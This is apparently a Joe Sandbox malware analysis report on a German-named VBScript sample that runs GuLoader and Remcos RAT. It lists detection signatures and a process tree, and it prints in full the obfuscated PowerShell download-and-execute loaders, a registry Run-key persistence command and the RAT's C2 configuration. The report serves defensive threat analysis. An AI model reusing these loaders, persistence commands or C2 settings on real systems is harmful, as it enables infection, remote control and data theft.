Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Beschwerde-AutoKauf.vbs

Overview

General Information

Sample name:Beschwerde-AutoKauf.vbs
Analysis ID:1565785
MD5:4446681fce0cae163942eb162fd4ee76
SHA1:9c235cf72cebbbb0c5bd480add8f1c2db437b793
SHA256:7ab71eea03d84976609bb0ed19aa1b33b784731a357065900618ae4c3b8761db
Tags:87-120-127-42vbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6120 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Beschwerde-AutoKauf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');while (!$Unadduceable) {auspiciums (Hjemmemarkedernes ' $HegMilV oAdbA a DlD :KoSf t a da MlBrt,raSkn NkKde = A$PrMJ.e nd,t KaT,3M 8') ;auspiciums $Internes;auspiciums (Hjemmemarkedernes ' GsBltInaHeRBlTPa-S.sOlLnoEK EOxP S Qu4');auspiciums (Hjemmemarkedernes ' $ gKaLReo ,BriAbrl a:JuuUdN DAStDC dIrUVecSuEElaPabSalKaeF,=La( Otb e aSFoT -OmPN aSaTGlh b T$AfoUrk SVaE ,JT e M)') ;auspiciums (Hjemmemarkedernes 'Ch$FlGS,L ,oApBPraTrL o:NyR neUnsW usaBCosTit CADinFrt IbaA.lTBlI tnR g =Un$PuG.kL sOStbFiaCoL,i: UA GSMiHOsL ER s,as s+De+A %Un$PeRtoI onBonObi rEFo.RucSeoBluCoNPaT') ;$Ammunitionsfabrikkens=$Rinnie[$Resubstantiating]}$Catfacing=330712;$Phoning197=28597;auspiciums (Hjemmemarkedernes 'To$SmGjeL CoOvbUna uL A: GOH vlaED R,hc aH,P.nI etR A oL ,IMozMae = O CgCyeS tBa-O.cVaOFoNS.tTrE.uNSiT,r u$Pho TKGus,nE OjP e');auspiciums (Hjemmemarkedernes 'Co$OrgEplFaoMebSvaMilaf:,oFBarAna fS.rFlsE e ,lBleFrnS ,e=Cy ,[ iSBrylnsC t,heDim . CP,ofonMevr.eRnrBrt ]D.:Ma: VF Br tor m rBIsa esBeeFi6 T4 BSAbt .r diO nR gS ( i$.eO vA e rSkcFoa tpGti DtSca Sl siOvzB eSn)');auspiciums (Hjemmemarkedernes ' e$AfGSaLRoO rb,raAml.e: Ap Ve ynE.tSeA esSct Fo ,mInuBomAg Li=Ou [EnS Y uSG.T leG MOp.AfTPse.uxErtCa. rEPeNT.CLaODoD .iUnNAng r] A: ,:p A iS ecPhiDaiO .v gSlEPrtP S VtK r IB.NDegMa(sc$ByF Tr eA ifMaROpS,oeK L pEAnNqu)');auspiciums (Hjemmemarkedernes ' i$GrG hL ounBMea slFc:Udh pU aR ST iIHjGPar dUsuTAvECer ,SU =un$U,P PeRuN ,tL aFesRhTH,OMiMSouA MEv.BrS.eU bHeSTet ,rcai.in BgUl( $Soc a TSufO.aLoCKeI ,NOrGLe, s$ Fp eHlaORenBai eNReGGr1 9M 7In)');auspiciums $Hurtigruters;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2536 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$eroticizing='Federarie';;$Slambehandlingsanlggets='Shadowishly';;$Udfolder='Briarwood';;$Jkel='Backingbandet';;$Gangarealerne138='Karakteristikkernes';;$Dokumenttype=$host.Name;function Hjemmemarkedernes($Rodfstede){If ($Dokumenttype) {$Afhjulpne=2} for ($Fabrikationens=$Afhjulpne;;$Fabrikationens+=3){if(!$Rodfstede[$Fabrikationens]) { break }$Puncheon+=$Rodfstede[$Fabrikationens]}$Puncheon}function auspiciums($ouananiche){ .($Recirculated) ($ouananiche)}$Cockneyfying=Hjemmemarkedernes ' n .EPiT .UnwTiE eBEpc,eLUsIHaeH nR T';$Noncandescent=Hjemmemarkedernes 'AaMlno AzT,iInl ,l a,e/';$Thoracostenosis=Hjemmemarkedernes 'S.T OlA,sTh1We2';$Kartonets247='Jo[ SNAnE oTB . ,S,nES.RA v ,I RCSte ,pslO riKnN.iTMambaaHan ,AE GSmEStr ] l:G :D S DEV.CTeuCerBiIFotDuY EP rR.aOMiT iOm csuoTel r= L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');while (!$Unadduceable) {auspiciums (Hjemmemarkedernes ' $HegMilV oAdbA a DlD :KoSf t a da MlBrt,raSkn NkKde = A$PrMJ.e nd,t KaT,3M 8') ;auspiciums $Internes;auspiciums (Hjemmemarkedernes ' GsBltInaHeRBlTPa-S.sOlLnoEK EOxP S Qu4');auspiciums (Hjemmemarkedernes ' $ gKaLReo ,BriAbrl a:JuuUdN DAStDC dIrUVecSuEElaPabSalKaeF,=La( Otb e aSFoT -OmPN aSaTGlh b T$AfoUrk SVaE ,JT e M)') ;auspiciums (Hjemmemarkedernes 'Ch$FlGS,L ,oApBPraTrL o:NyR neUnsW usaBCosTit CADinFrt IbaA.lTBlI tnR g =Un$PuG.kL sOStbFiaCoL,i: UA GSMiHOsL ER s,as s+De+A %Un$PeRtoI onBonObi rEFo.RucSeoBluCoNPaT') ;$Ammunitionsfabrikkens=$Rinnie[$Resubstantiating]}$Catfacing=330712;$Phoning197=28597;auspiciums (Hjemmemarkedernes 'To$SmGjeL CoOvbUna uL A: GOH vlaED R,hc aH,P.nI etR A oL ,IMozMae = O CgCyeS tBa-O.cVaOFoNS.tTrE.uNSiT,r u$Pho TKGus,nE OjP e');auspiciums (Hjemmemarkedernes 'Co$OrgEplFaoMebSvaMilaf:,oFBarAna fS.rFlsE e ,lBleFrnS ,e=Cy ,[ iSBrylnsC t,heDim . CP,ofonMevr.eRnrBrt ]D.:Ma: VF Br tor m rBIsa esBeeFi6 T4 BSAbt .r diO nR gS ( i$.eO vA e rSkcFoa tpGti DtSca Sl siOvzB eSn)');auspiciums (Hjemmemarkedernes ' e$AfGSaLRoO rb,raAml.e: Ap Ve ynE.tSeA esSct Fo ,mInuBomAg Li=Ou [EnS Y uSG.T leG MOp.AfTPse.uxErtCa. rEPeNT.CLaODoD .iUnNAng r] A: ,:p A iS ecPhiDaiO .v gSlEPrtP S VtK r IB.NDegMa(sc$ByF Tr eA ifMaROpS,oeK L pEAnNqu)');auspiciums (Hjemmemarkedernes ' i$GrG hL ounBMea slFc:Udh pU aR ST iIHjGPar dUsuTAvECer ,SU =un$U,P PeRuN ,tL aFesRhTH,OMiMSouA MEv.BrS.eU bHeSTet ,rcai.in BgUl( $Soc a TSufO.aLoCKeI ,NOrGLe, s$ Fp eHlaORenBai eNReGGr1 9M 7In)');auspiciums $Hurtigruters;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6940 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2740 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Afskibning" /t REG_EXPAND_SZ /d "%Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • wscript.exe (PID: 3848 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\romerret.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • powershell.exe (PID: 6272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (Ructation 'O sLetNeaExrKaTTa-N,SSula.EMaEhjP,o Do4');Fashioneringer (Ructation 'pl$L,gL l SOSeBCoAUnlA :FoireDSwEHvAR.L .i kZ SEAnrI =In( LT SeKnsf,Tti-C P gAShtSvHHu .a$ SUlt aMitXySDvb VEYaS SGsle ,n,nE S )') ;Fashioneringer (Ructation 'Ra$ Bg LO O BNoaU,LH,:YeB TABrr SbLuA CsMaCSuoDeSfo=Sl$S gk L eo Ab uA ML A:S,vJoA dIleAnSLat eeDiD lE SRKoN PE I+P + p%Un$Enf orTie,rMDoTNivr U,hnPrGIsE ut .GucP OHeUOpNV.T') ;$Fishgrass=$Fremtvunget[$Barbascos]}$Benaadningerne=316180;$Renummereringsfunktionens164=29066;Fashioneringer (Ructation ' $U GLeL DOO B.rABrlBr:S.dUnIdosOvp loP N eUnR HeVat , .u=r. LeG,ee tSy-u CStOCunNoT FEDaNXeTWh Pr$ rsSktHaAS T US BB CeUrs RgLiE dn,oE SS');Fashioneringer (Ructation 'Ke$ DgP,l ioH b aTel :BuEBrt.ohM.y l nsMauInlampF hPru KrHeiPec a d =Ry [ FSlayE,s ItAle umOv.,mC UoMon,cvBae ,rDetOp] a:Un:TuFCurLyoLamPaBC a sSneDe6hy4UnS EtTor fi onTig,i(.a$AwD.ei esNop,eossnH eGerreelrt v)');Fashioneringer (Ructation 'Ze$ oG olF oPeBOraenlHe: Ss ,h .IBemA.O N.aOUnsSyE aKQuIFi ,e=Ri R[A SStyEpsCrTdaE M,h.butmyETaxV TNy.HeeUdNKoCinOBodS,i an SgSu] l: ,:FuA oS CCReI IYd.PegG eTrTT S.otCir GiDeNAiGMa(K.$NoeenT HSkyDiL Tsnou.elu pC.HPsUPhRBuIIncHo)');Fashioneringer (Ructation 'tr$Ing ,LLeO obF.A SL B:.rkSgO iBrnStOFoNRu= R$ .sAphUnI rm HoP.Nh.OCaS CERukMii .Ses.vU ABRrsNut aR.rIspN fGRe(Gt$ ab .eVun A ,aDeD ,nPriKaN Gg DERiRAnN eEBo,Sk$UnR,ue FNPau RmSpm HE SRUnEDaRKuiK,NNegSuSkoFBru SnSukstt i MoQunSceSpnShS a1P.6Fr4 k)');Fashioneringer $Koinon;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 4192 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Schr. an GGV bzgl. Schadenersatzes.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 2696 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 1748 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1756,i,10988508306873604360,9647828902671235377,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 1060 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["www.tla-autos.com:9945:1"], "Assigned name": "TelOu62tos", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "TeleAuto8926-8WB4GE", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000D.00000002.3009830542.00000000091F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000003.00000002.2994471945.0000000006C8D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000D.00000002.3010102777.00000000093F8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.2952642850.000000000064A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 11 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_1620.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_2536.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xbdf1:$b2: ::FromBase64String(
              • 0xae63:$s1: -join
              • 0x11098:$s3: reverse
              • 0x460f:$s4: +=
              • 0x46d1:$s4: +=
              • 0x88f8:$s4: +=
              • 0xaa15:$s4: +=
              • 0xacff:$s4: +=
              • 0xae45:$s4: +=
              • 0x14788:$s4: +=
              • 0x14808:$s4: +=
              • 0x148ce:$s4: +=
              • 0x1494e:$s4: +=
              • 0x14b24:$s4: +=
              • 0x14ba8:$s4: +=
              • 0xb697:$e4: Get-WmiObject
              • 0xb886:$e4: Get-Process
              • 0xb8de:$e4: Start-Process
              • 0x1543e:$e4: Get-Process
              amsi32_6272.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_6272.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xa294:$b2: ::FromBase64String(
                • 0x9242:$s1: -join
                • 0x29ee:$s4: +=
                • 0x2ab0:$s4: +=
                • 0x6cd7:$s4: +=
                • 0x8df4:$s4: +=
                • 0x90de:$s4: +=
                • 0x9224:$s4: +=
                • 0x12e27:$s4: +=
                • 0x12ea7:$s4: +=
                • 0x12f6d:$s4: +=
                • 0x12fed:$s4: +=
